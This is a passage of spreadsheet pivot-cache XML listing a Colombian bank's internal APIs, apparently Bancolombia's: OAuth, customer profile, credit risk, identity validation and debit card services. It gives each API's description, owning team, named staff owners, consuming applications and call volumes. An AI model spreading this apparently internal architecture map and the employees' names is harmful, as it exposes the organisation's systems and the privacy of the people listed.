    <x v="147"/>
    <s v="Proveedor de OAuth que cambia Id de sesión por un Token de acceso para canales virtuales"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="26"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="1748"/>
    <n v="2877"/>
    <n v="4520"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-30T17:02:26"/>
    <s v="Customer Products"/>
    <n v="100"/>
    <s v="Customer Products Natural Person"/>
    <n v="100"/>
    <x v="148"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los productos que posee un cliente en el banco."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="1"/>
    <n v="23"/>
    <n v="736"/>
    <n v="13533"/>
    <n v="60179"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-30T17:02:26"/>
    <s v="Customer Products"/>
    <n v="100"/>
    <s v="Customer Products Relationship Management"/>
    <n v="100"/>
    <x v="149"/>
    <s v="A través de esta API se puede administrar la Relación Cliente-Producto, permitiendo crear, editar o eliminar registros."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-01-27T15:12:20"/>
    <s v="Customer Profile Information"/>
    <n v="103"/>
    <s v="Customer Profile Information - Private External Sources"/>
    <n v="103"/>
    <x v="150"/>
    <s v="El API permite obtener una  información detallada de una persona natural o jurí­dica, este detalle da a conocer la localización geográfica, validación de direcciones, teléfonos, celulares, correos electrónicos, los datos de contacto, parámetros de usuarios y productos relacionados a esta persona, dependiendo de su tipo y numero de documento y el primer apellido."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ APP_AW1318001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-04T09:56:25"/>
    <s v="Customer Profile Product"/>
    <n v="100"/>
    <s v="Customer Profile Product - Information"/>
    <n v="100"/>
    <x v="151"/>
    <s v="Esta API permite identificar informacion sobre un cliente con base en la informacion de expirian "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CPPALM_AW1086001 _x000d__x000a_ RespuestaAlFrente_AW1086001 _x000d__x000a_ ConsultaInformacionBuroCredito_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-30T09:14:03"/>
    <s v="Customer Reference Data Mgmt"/>
    <n v="102"/>
    <s v="Customer Reference Data Mgmt - Bank Statements"/>
    <n v="102"/>
    <x v="152"/>
    <s v="El API permite obtener los periodos disponibles para consulta y los extractos, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v="ConsultaExtractosCliente/V1.0"/>
    <s v="Paradoc - Extracto Unificado FE_EUC,COLD,EBP, MAM_AW0826001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Thanos_AW1326001"/>
    <n v="45035"/>
    <n v="40844"/>
    <n v="43006"/>
    <n v="213670"/>
    <n v="575549"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-19T16:36:17"/>
    <s v="Customer Relationships Data"/>
    <n v="101"/>
    <s v="Customer Relationships Data - Information"/>
    <n v="101"/>
    <x v="153"/>
    <s v="Permite consultar la información de las relaciones o ví­nculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosRelacionesCliente/V1.0"/>
    <m/>
    <s v="AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ AppSarlaft_AW1176001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="234"/>
    <n v="2780"/>
    <n v="271"/>
    <n v="1164"/>
    <n v="867"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-26T15:33:58"/>
    <s v="Customer Tracking"/>
    <n v="103"/>
    <s v="Customer Request Tracking"/>
    <n v="103"/>
    <x v="154"/>
    <s v="La Api ofrece a los consumidores, la capacidad de registrar las novedades de los servicios que tiene como cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="SAPCRM_AW0611001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="9330"/>
    <n v="16286"/>
    <n v="18003"/>
    <n v="22346"/>
    <n v="52757"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-26T16:07:59"/>
    <s v="Customer Tracking"/>
    <n v="205"/>
    <s v="Customer Request Tracking"/>
    <n v="205"/>
    <x v="154"/>
    <s v="La Api ofrece a los consumidores, la capacidad de registrar las novedades de los servicios que tiene como cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v=""/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TRACKINGSIM_NU0098001 _x000d__x000a_ SAPCRM_AW0611001 _x000d__x000a_ TRACKING_NU0098001"/>
    <n v="9330"/>
    <n v="16286"/>
    <n v="18003"/>
    <n v="22346"/>
    <n v="52757"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-18T15:47:06"/>
    <s v="Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk - Group"/>
    <n v="101"/>
    <x v="155"/>
    <s v="Esta API permite exponer el grupo de riesgo al que pertenece un cliente y el detalle de los integrantes que conforman dicho grupo. Un grupo de riesgo es un conjunto de personas naturales y/o jurí­dicas que se relacionan entre sí­; por ví­nculos de capital y subordinación, administrativos, de negocio, familiares, entre otras; que implican un riesgo en comíºn entre las partes. Para consolidar los grupos de riesgos se tiene en cuenta los motivos de conformación que se establecen en el titulo 2 y 3 del Decreto 2555 regulado por la Superintendencia Financiera de Colombia (Lí­mites individuales de crédito y concentración de riesgo). Los grupos están clasificados por: '¢_x0009_Legales: Son los que cumplen los motivos legales del Decreto, es decir, que son soportados. '¢_x0009_Internos: Estos son grupos administrativos que no necesariamente cumplen el motivo legal, pero que internamente se identifica un riesgo comíºn desde el conocimiento del cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="24"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v="ConsultaGruposDeRiesgo/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="391"/>
    <n v="114"/>
    <n v="91"/>
    <n v="1588"/>
    <n v="1722"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-09T15:15:27"/>
    <s v="Tec-Customer Risk"/>
    <n v="200"/>
    <s v="Customer Risk - Group"/>
    <n v="200"/>
    <x v="155"/>
    <s v="Esta API permite exponer el grupo de riesgo al que pertenece un cliente y el detalle de los integrantes que conforman dicho grupo. Un grupo de riesgo es un conjunto de personas naturales y/o jurí­dicas que se relacionan entre sí­; por ví­nculos de capital y subordinación, administrativos, de negocio, familiares, entre otras; que implican un riesgo en comíºn entre las partes. Para consolidar los grupos de riesgos se tiene en cuenta los motivos de conformación que se establecen en el titulo 2 y 3 del Decreto 2555 regulado por la Superintendencia Financiera de Colombia (Lí­mites individuales de crédito y concentración de riesgo). Los grupos están clasificados por: '¢_x0009_Legales: Son los que cumplen los motivos legales del Decreto, es decir, que son soportados. '¢_x0009_Internos: Estos son grupos administrativos que no necesariamente cumplen el motivo legal, pero que internamente se identifica un riesgo comíºn desde el conocimiento del cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="24"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v="ConsultaGruposDeRiesgo/V1.0"/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <n v="391"/>
    <n v="114"/>
    <n v="91"/>
    <n v="1588"/>
    <n v="1722"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-19T16:48:02"/>
    <s v="Customer Risk Behavior"/>
    <n v="101"/>
    <s v="Customer Risk Behavior - Assessment"/>
    <n v="101"/>
    <x v="156"/>
    <s v="El API Customer Risk Behavior - Assessment V1.0.1 se encarga de consultar las centrales Internas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46259"/>
    <n v="43849"/>
    <n v="37500"/>
    <n v="36910"/>
    <n v="48779"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-12-07T16:37:01"/>
    <s v="Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk Behavior - Assessment"/>
    <n v="102"/>
    <x v="156"/>
    <s v="El API Customer Risk Behavior - Assessment V1.0.1 se encarga de consultar las centrales Internas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46259"/>
    <n v="43849"/>
    <n v="37500"/>
    <n v="36910"/>
    <n v="48779"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-19T16:48:02"/>
    <s v="Customer Risk Behavior"/>
    <n v="103"/>
    <s v="Customer Risk Behavior - Credit Registries"/>
    <n v="103"/>
    <x v="157"/>
    <s v="El API Customer Risk Behavior - Credit Registries V1.0.0 se encarga de consultar las centrales externas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo en entidades diferentes al grupo Bancolombia, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46404"/>
    <n v="45021"/>
    <n v="39019"/>
    <n v="37089"/>
    <n v="48918"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-28T15:48:33"/>
    <s v="Tec-Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk Validate Identity"/>
    <n v="111"/>
    <x v="158"/>
    <s v="API permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="ConfirmarIdentidadPersonaEnDataCredito/V2.0"/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="4"/>
    <n v="1036"/>
    <n v="18729"/>
    <n v="19696"/>
    <n v="28966"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-11T17:55:26"/>
    <s v="Customer Security"/>
    <n v="101"/>
    <s v="Customer Security - Alias"/>
    <n v="101"/>
    <x v="159"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal. Así­ mismo, en la Consulta del Alias ofrece la capacidad de recolectar la información propia de un alias o de todos los alias, asociados a una identidad, así­ mismo de la información de esta."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="FUA_AW1291001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="205"/>
    <s v="Customer Security - Alias"/>
    <n v="202"/>
    <x v="159"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="300"/>
    <s v="Customer Security - Alias"/>
    <n v="300"/>
    <x v="159"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v=""/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ NU0046001_NETWORKING_MR _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-11T17:55:26"/>
    <s v="Customer Security"/>
    <n v="101"/>
    <s v="Customer Security - Identity"/>
    <n v="101"/>
    <x v="160"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="FUA_AW1291001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="205"/>
    <s v="Customer Security - Identity"/>
    <n v="205"/>
    <x v="160"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="300"/>
    <s v="Customer Security - Identity"/>
    <n v="300"/>
    <x v="160"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v=""/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ NU0046001_NETWORKING_MR _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-21T14:49:28"/>
    <s v="Customer Data Sufi"/>
    <n v="110"/>
    <s v="Customers"/>
    <n v="100"/>
    <x v="161"/>
    <s v="API para consulta de datos generales Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="adaptadorSufi_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="5"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-20T16:27:53"/>
    <s v="Customers Case Management"/>
    <n v="100"/>
    <s v="Customers Case Management-Customers Case"/>
    <n v="100"/>
    <x v="162"/>
    <s v="Permite la Administración de la creación de solicitudes de un Cliente"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="24"/>
    <n v="32"/>
    <n v="27"/>
    <n v="25"/>
    <n v="89"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-23T15:01:36"/>
    <s v="CustomerValidation"/>
    <n v="100"/>
    <s v="Customer-Validation-ControlList"/>
    <n v="100"/>
    <x v="163"/>
    <s v="API que permite listar los detalles de un cliente en Listas de Control."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="MUVERANG_NU0063001 _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="3297"/>
    <n v="4087"/>
    <n v="3192"/>
    <n v="3032"/>
    <n v="4527"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Administration"/>
    <n v="109"/>
    <x v="164"/>
    <s v="Esta API permite exponer las diferentes de gestión relativas a productos débito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación: - Validar titularidad  - Asociar medio de pago a cuenta  - Bloquear tarjeta  - Desbloquear tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="NovedadesTarjetasDebito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="2979"/>
    <n v="2784"/>
    <n v="2427"/>
    <n v="2131"/>
    <n v="2366"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-24T17:06:33"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Debit Cards"/>
    <n v="118"/>
    <x v="165"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito.   - Listar las tarjetas activas de un cliente - Listar las tarjetas pendientes por activar - Listar las tarjetas canceladas - Consultar codigo de seguridad"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="2988425"/>
    <n v="2847085"/>
    <n v="2758550"/>
    <n v="2702883"/>
    <n v="3044197"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-29T18:01:42"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Information"/>
    <n v="109"/>
    <x v="166"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="110726"/>
    <n v="123853"/>
    <n v="102481"/>
    <n v="115036"/>
    <n v="122307"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-25T17:32:49"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card - Management"/>
    <n v="1012"/>
    <x v="167"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de débito. Incluye capacidades de novedades y validacionees."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="GestionTarjetasCredito/V2.0_x000a_GestionTarjetasDebito/V2.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="12165"/>
    <n v="13378"/>
    <n v="18385"/>
    <n v="17411"/>
    <n v="21476"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T21:41:22"/>
    <s v="Debit Card"/>
    <n v="1115"/>
    <s v="Debit Card Cost"/>
    <n v="103"/>
    <x v="168"/>
